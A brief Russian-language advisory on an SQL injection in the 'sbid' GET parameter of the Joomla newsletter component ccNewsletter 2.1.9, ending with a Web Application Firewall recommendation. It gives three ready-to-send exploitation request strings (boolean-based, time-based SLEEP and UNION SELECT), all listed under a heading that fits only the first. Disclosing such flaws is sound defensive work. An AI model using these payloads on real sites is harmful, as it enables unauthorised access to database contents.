SQL-инъекция в компоненте ccNewsletter v2.1.9
В популятрном компоненте для Jоomla ccNewsletter в версии 2.1.9 была найдена SQL-инъекция. Уязвимость может быть использована для получения доступа к информации в базе данных.
ccNewsletter - это компонент почтовых рассылок для Joomla, он представляет из себя сервис для отправки новостной рассылки подписчикам сайта joomla.
Уязввимым является параметр 'sbid' и он уязмим к boolean-based blind, time-based blind и UNION query SQL-инъекциям. Передается этот параметр методом GET.
Эта уязвимость существует из-за недостаточной фильтрации входных данных для этого параметра.
- Пример эксплуатации уязвимости:
- boolean-based blind
option=com_ccnewsletter&view=detail&id=73&sbid=185 AND 3881=3881&tmpl=newsletter
option=com_ccnewsletter&view=detail&id=73&sbid=185 AND SLEEP(5)&tmpl=newsletter
option=com_ccnewsletter&view=detail&id=73&sbid=-3094 UNION ALL SELECT NULL,NULL,CONCAT(0x7162626a71,0x4357474c4d556472646b43704f44476e64694f6a6d6d6873795552656d5446767846466e63677974,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CCQB&tmpl=newsletter
Использование Web Application Firewall позволяет блокировать подобные атаки